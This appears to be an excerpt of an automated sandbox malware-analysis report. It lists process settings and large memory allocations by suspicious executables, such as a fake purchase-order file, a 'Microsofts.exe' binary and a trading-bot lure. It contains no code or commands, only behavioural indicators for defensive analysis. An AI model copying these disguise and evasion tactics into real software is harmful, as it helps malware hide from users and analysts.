                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Allocates many large memory junks
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2E10000 memory commit 500006912
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2E11000 memory commit 500178944
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2E3C000 memory commit 500002816
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2E3D000 memory commit 500199424
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2E6E000 memory commit 501014528
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2F66000 memory commit 500006912
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2F68000 memory commit 500015104
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2E20000 memory commit 500006912
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2E21000 memory commit 500178944
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2E4C000 memory commit 500002816
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2E4D000 memory commit 500199424
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2E7E000 memory commit 501014528
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2F76000 memory commit 500006912
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2F78000 memory commit 500015104
                          Source: C:\Users\user\Desktop\PO_B2W984.comMemory allocated: 2DD0000 memory commit 500006912Jump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comMemory allocated: 2DD1000 memory commit 500178944Jump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comMemory allocated: 2DFC000 memory commit 500002816Jump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comMemory allocated: 2DFD000 memory commit 500199424Jump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comMemory allocated: 2E2E000 memory commit 501014528Jump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comMemory allocated: 2F26000 memory commit 500006912Jump to behavior
                          Source: C:\Users\user\Desktop\PO_B2W984.comMemory allocated: 2F28000 memory commit 500015104Jump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 29530000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 29740000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 29560000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2AC0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2D00000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2C30000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 6390000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2E390000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeMemory allocated: EA0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeMemory allocated: 2C60000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeMemory allocated: 4C60000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 2D4B0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 2DA90000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 2D660000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 30600000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 30990000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 32990000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 15B0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 2FF0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 1620000 memory reserve | memory write watch
